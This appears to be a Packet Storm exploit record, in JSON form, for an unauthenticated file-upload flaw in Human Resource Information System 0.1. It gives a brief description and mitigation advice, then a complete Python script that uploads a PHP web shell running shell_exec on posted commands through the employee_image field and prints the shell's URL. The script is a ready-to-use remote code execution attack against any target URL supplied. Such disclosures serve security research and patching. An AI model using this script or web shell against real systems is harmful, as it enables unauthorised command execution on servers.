{"id": "PACKETSTORM:162496", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Human Resource Information System 0.1 Remote Code Execution", "description": "", "published": "2021-05-07T00:00:00", "modified": "2021-05-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/162496/Human-Resource-Information-System-0.1-Remote-Code-Execution.html", "reporter": "Reza Afsahi", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-07T15:56:55", "viewCount": 262, "enchantments": {"dependencies": {}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "_state": {"dependencies": 1678920471, "score": 1678917189, "epss": 1679070268}, "_internal": {"score_hash": "c5819d93b20d79eb6b4b60e2d3e6a971"}, "sourceHref": "https://packetstormsecurity.com/files/download/162496/hris01-exec.txt", "sourceData": "`# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) \n# Date: 04-05-2021 \n# Exploit Author: Reza Afsahi \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html \n# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code \n# Version: 0.1 \n# Tested on: PHP 7.4.11 , Linux x64_x86 \n \n############################################################################################################ \n \n# Description: \n# The proof of concept below shows that the add-employee handler (/Admin_Dashboard/process/addemployee_process.php) accepts a file in the employee_image field without authentication and without rejecting a .php file; the file is then served from a path under /Admin_Dashboard/ where the web server executes it, which results in remote code execution. \n# Mitigation: require an authenticated session on the handler, accept only image files, and store uploads where the web server does not execute them. 
\n \n############################################################################################################ \n \n# Proof of concept: \n \n#!/usr/bin/python3 \n \nimport requests \nimport sys \nfrom bs4 import BeautifulSoup \n \ndef find_shell(domain): \nreq_2 = requests.get(domain + \"/Admin_Dashboard/Add_employee.php\") \nsoup = BeautifulSoup(req_2.content , \"html.parser\") \nimgs = soup.find_all(\"img\") \nfor i in imgs: \nsrc = i['src'] \nif (\"shell.php\" in src): \nprint(\" [!] Your shell is ready :) ==> \" + domain + \"/Admin_Dashboard/\" + src + \"\\n\") \nbreak \nelse: \ncontinue \n \ndef upload_file(domain): \n \nprint(\"\\n [!] Uploading Shell . . .\") \npayload = \"\"\" \n<!DOCTYPE html> \n<html> \n<head> \n<title> Shell </title> \n</head> \n<body> \n<form action=\"#\" method=\"post\"> \n<input type=\"text\" name=\"cmd\" style=\"width: 300px; height: 30px;\" placeholder=\"Your Command ...\"> \n<br><br> \n<input type=\"submit\" name=\"submit\" value=\"execute\"> \n</form> \n<?php \n$cmd = $_POST['cmd']; \n$result = shell_exec($cmd); \necho \"<pre>{$result}</pre>\"; \n \n?> \n</body> \n</html> \n\"\"\" \n \nh = { \n\"Content-Type\" : \"multipart/form-data\" \n} \n \nf = {'employee_image':('shell.php',payload, \n'application/x-php', {'Content-Disposition': 'form-data'} \n) \n} \nd = { \n\"emplo\" : \"\", \n\"employee_companyid\" : \"test\", \n\"employee_firstname\" : \"test\", \n\"employee_lastname\" : \"test\", \n\"employee_middlename\" : \"test\", \n\"branches_datefrom\" : \"0011-11-11\", \n\"branches_recentdate\" : \"2222-11-11\", \n\"employee_position\" : \"test\", \n\"employee_contact\" : \"23123132132\", \n\"employee_sss\" : \"test\", \n\"employee_tin\" : \"test\", \n\"employee_hdmf_pagibig\" : \"test\", \n\"employee_gsis\" : \"test\" \n} \nurl = domain + \"/Admin_Dashboard/process/addemployee_process.php\" \nreq = requests.post(url , data=d , files = f) \nif req.status_code == 200: \nif (\"Insert Successfully\" in req.text): \nprint(\"\\n [!] 
Shell uploaded succefully\\n\") \nfind_shell(domain) \n \nelse: \nprint(\"Exploit Failed 1\") \n \ndef main(): \nif len(sys.argv) != 2: \nprint('[!] usage: %s <target url> ' % sys.argv[0]) \nprint('[!] eg: %s http://vulndomain.com' % sys.argv[0]) \nsys.exit(-1) \n \nprint(\"<><><><><><><><><><><><><><><><><><><><><><><><>\") \nprint(\"<> Human Resource Information System <>\") \nprint(\"<> Shell Uploader <>\") \nprint(\"<><><><><><><><><><><><><><><><><><><><><><><><>\") \ntarget_domain = sys.argv[1] \nupload_file(target_domain) \n \nif __name__ == \"__main__\": \nmain() \n \n \n`\n"}
{}